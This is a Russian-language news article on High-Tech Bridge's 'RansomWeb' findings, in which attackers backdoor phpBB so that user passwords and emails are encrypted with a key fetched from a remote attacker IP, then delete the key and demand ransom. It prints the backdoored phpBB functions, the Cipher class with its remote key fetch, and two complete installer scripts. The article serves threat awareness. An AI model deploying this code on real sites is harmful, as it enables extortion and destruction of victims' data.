«RansomWeb» новый вектор атаки, который шифрует базы данных веб-сайтов

Исследователи из High-Tech Bridge опубликовали исследование о киберпреступниках, которые шифруют базы данных веб-сайтов и требуют выкуп с помощью «RansomWeb»

Все больше людей становятся жертвами программ-вымогателей, вредоносного ПО, которое шифрует ваши данные и требует деньги за их расшифровку. Новая тенденция на рынке показывает, что киберпреступники теперь будут нацеливаться на ваш веб-сайт, чтобы получить выкуп от вас.

В декабре 2014 года эксперты по безопасности High-Tech Bridge обнаружили очень интересный случай компрометации веб-сайта финансовой компании: веб-сайт был недоступен, отображая ошибку базы данных, в то время как владелец сайта получил электронное письмо с требованием выкупа за «расшифровку базы данных». Веб-приложение, о котором идет речь, было довольно простым и небольшим, но очень важным для бизнеса компании – компания не могла позволить себе приостановить его работу или объявить о его компрометации. Тщательное расследование, проведенное High-Tech Bridge, выявило следующее:

• Веб-приложение было скомпрометировано шесть месяцев назад, несколько серверных скриптов были изменены для шифрования данных перед их вставкой в базу данных и для расшифровки после получения данных из базы данных. Своего рода «поправка на лету», невидимая для пользователей веб-приложения.

• Только самые критические поля таблиц базы данных были зашифрованы (вероятно, чтобы не повлиять на производительность веб-приложения). Все ранее существующие записи базы данных были соответственно зашифрованы.

• Ключ шифрования хранился на удаленном веб-сервере, доступном только через HTTPS (вероятно, чтобы избежать перехвата ключа различными системами мониторинга трафика).

• В течение шести месяцев хакеры молча ждали, пока резервные копии не были перезаписаны последними версиями базы данных.

• В день X хакеры удалили ключ с удаленного сервера. База данных стала непригодной, веб-сайт вышел из строя, и хакеры потребовали выкуп за ключ шифрования.

Исследователи заявили, что они уверены, что это был индивидуальный пример сложной APT, нацеленной на конкретную компанию, однако на прошлой неделе они столкнулись с еще одним подобным случаем. Один из их клиентов, малый и средний бизнес, был шантажирован после того, как его… phpBB форум вышел из строя. Форум использовался как основная платформа для поддержки клиентов и, следовательно, был важен для клиента.

Это была последняя версия phpBB 3.1.2, выпущенная 25 ноября 2014 года. Ни один пользователь не мог войти в систему (включая модераторов и администраторов форума). Форум был онлайн, однако все функции, требующие аутентификации пользователя форума, не работали. Наше тщательное расследование показало, что движок форума был изменен таким образом, что пароли и электронные адреса пользователей шифровались «на лету» между веб-приложением и базой данных.

Следующие файлы были изменены:

1. Файл «factory.php» имеет измененную функцию «sql_fetchrow()» таким образом, что результат SQL-запроса «$result = $this->get_driver()->sql_fetchrow($query_id);» в массиве «result» будет иметь расшифрованные значения полей таблицы «user_password» и «user_email»:
   if(isset($result[‘user_password’])){
   $result[‘user_password’] = $cipher->decrypt($result[‘user_password’]);
   }
   if(isset($result[‘user_email’])){
   $result[‘user_email’] = $cipher->decrypt($result[‘user_email’]);
   }
2. Файл «functions_user.php» имеет измененную версию функции «user_add» для добавления шифрования:
   $sql_ary = array(
   ‘username’=>$user_row[‘username’],
   ‘username_clean’ => $username_clean,
   ‘user_password’ => (isset($user_row[‘user_password’]))?
   $cipher->encrypt($user_row[‘user_password’]):$cipher->encrypt(”),
   ‘user_email’=> $cipher->encrypt(strtolower($user_row[‘user_email’])),
   ‘user_email_hash’=> phpbb_email_hash($user_row[‘user_email’]),
   ‘group_id’ => $user_row[‘group_id’],
   ‘user_type’ => $user_row[‘user_type’],
   );
3. Файл «cp_activate.php» имеет измененную версию функции «main()»:
   $sql_ary = array(
   ‘user_actkey’ => ”,
   ‘user_password’ => $cipher->encrypt($user_row[‘user_newpasswd’]),
   ‘user_newpasswd’ => ”,
   ‘user_login_attempts’ => 0,
   );
4. Файл «ucp_profile.php» имеет измененную версию функции «main()»:
   if (sizeof($sql_ary))
   {
   $sql_ary[‘user_email’] = $cipher->encrypt($sql_ary[‘user_email’]);
   $sql_ary[‘user_password’] = $cipher->encrypt($sql_ary[‘user_password’]);
   $sql = ‘UPDATE ‘ . USERS_TABLE . ‘
   SET ‘ . $db->sql_build_array(‘UPDATE’, $sql_ary) . ‘
   WHERE user_id = ‘ . $user->data[‘user_id’];
   $db->sql_query($sql);
   }
5. Файл «config.php» имел следующее изменение:
   class Cipher {
   private $securekey, $iv;
   function __construct($textkey) {
   $this->securekey = hash(‘sha256’,$textkey,TRUE);
   $this->iv = mcrypt_create_iv(32);
   }
   function encrypt($input) {
   return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
   $this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
   }
   function decrypt($input) {
   return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
   $this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
   }
   }
   $key=file_get_contents(‘https://103.13.120.108/sfdoif89d7sf8d979dfgf/
   sdfds90f8d9s0f8d0f89.txt’);
   $cipher=new Cipher($key);

Кроме того, исследователи нашли два скрипта установки бэкдоров, оставленных хакерами на сервере, которые позволяют установить бэкдор на любой phpBB форум всего за несколько кликов. Первый установщик изменяет файл «config.php», добавляя класс «Cipher», который шифрует и расшифровывает данные с помощью функции PHP «mcrypt_encrypt()», храня ключ шифрования на удаленном сервере:

$file = ‘../config.php’;
$txt = “ ”.’class Cipher {
private $securekey, $iv;
function construct($textkey) {
$this->securekey = hash(\’sha256\’,$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
}
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
}
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
}
}
$key=file_get_contents(\’https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt\’);
$cipher=new Cipher($key);’.” ”;
if( FALSE !== file_put_contents($file, $txt, FILE_APPEND | LOCK_EX)){
echo “ГОТОВО!”;
}; И второй установщик парсит всех существующих пользователей phpBB, чтобы зашифровать их электронные адреса и пароли, и заменяет вышеупомянутые файлы phpBB на копии с бэкдором:
define(‘IN_PHPBB’, true);
$phpbb_root_path = (defined(‘PHPBB_ROOT_PATH’)) ? PHPBB_ROOT_PATH : ‘../’;
$phpEx = substr(strrchr(FILE__, ‘.’), 1);
include($phpbb_root_path . ‘common.’ . $phpEx);
include($phpbb_root_path . ‘includes/functions_display.’ . $phpEx);
$sql = ‘SELECT user_id, user_password, user_email FROM ‘ . USERS_TABLE;
$result = $db->sql_query($sql);
while ($row = $db->sql_fetchrow($result))
{
$sql2 = ‘UPDATE ‘ . USERS_TABLE . ‘
SET
user_password = “‘.$cipher->encrypt($row[‘user_password’]).’”,
user_email = “‘.$cipher->encrypt($row[‘user_email’]).’”
WHERE user_id = ‘.$row[‘user_id’];
$result2 = $db->sql_query($sql2);
}
echo “SQL ОБНОВЛЕН!
”;
copy(‘factory.php’, ‘../phpbb/db/driver/factory.php’);
copy(‘functions_user.php’, ‘../includes/functions_user.php’);
copy(‘ucp_activate.php’, ‘../includes/ucp/ucp_activate.php’);
copy(‘ucp_profile.php’, ‘../includes/ucp/ucp_profile.php’);
echo “ФАЙЛЫ ОБНОВЛЕНЫ!”;

Атакующие ждали два месяца, а затем просто удалили ключ с удаленного сервера. Исследователи High-Tech Bridge позже обнаружили, что phpBB был скомпрометирован через украденный FTP пароль.
На данный момент ни одно антивирусное программное обеспечение не обнаруживает даже установщики как известное вредоносное ПО:
“step1.php” файл
“step2.php” файл

Следуя волне атак программ-вымогателей, исследователи назвали эту технику взлома «RansomWeb».

• Давайте попробуем сделать краткий анализ атак RansomWeb:

• Потенциальные возможности RansomWeb:

• В отличие от DDoS-атак, они могут иметь долговременное влияние на доступность веб-приложения.

• Могут использоваться не только для шантажа, но и для долгосрочного разрушения веб-сайта.

• Резервные копии не могут сильно помочь, так как база данных будет резервироваться в зашифрованном режиме, в то время как ключ шифрования хранится удаленно и не будет резервироваться.

• Почти невозможно восстановиться после атаки без выплаты выкупа, многие жертвы не будут иметь выбора, кроме как заплатить хакерам.

• Хостинг-компании не готовы к этому новому вызову и, вероятно, не смогут помочь своим клиентам.

Исследователи также выявили потенциальные слабости «RansomWeb», которые приведены ниже:

• Может быть легко обнаружен монитором целостности файлов (однако очень немногие компании проводят мониторинг целостности файлов для веб-приложений, которые могут изменяться каждый день).

• Довольно сложно зашифровать всю базу данных, не повредив функциональности и/или скорости веб-приложения (тем не менее, даже одно поле БД, которое невозможно восстановить, может разрушить веб-приложение).

• Может быть обнаружен довольно быстро, когда используется на регулярно обновляемом веб-приложении.

Источник: High-Tech Bridge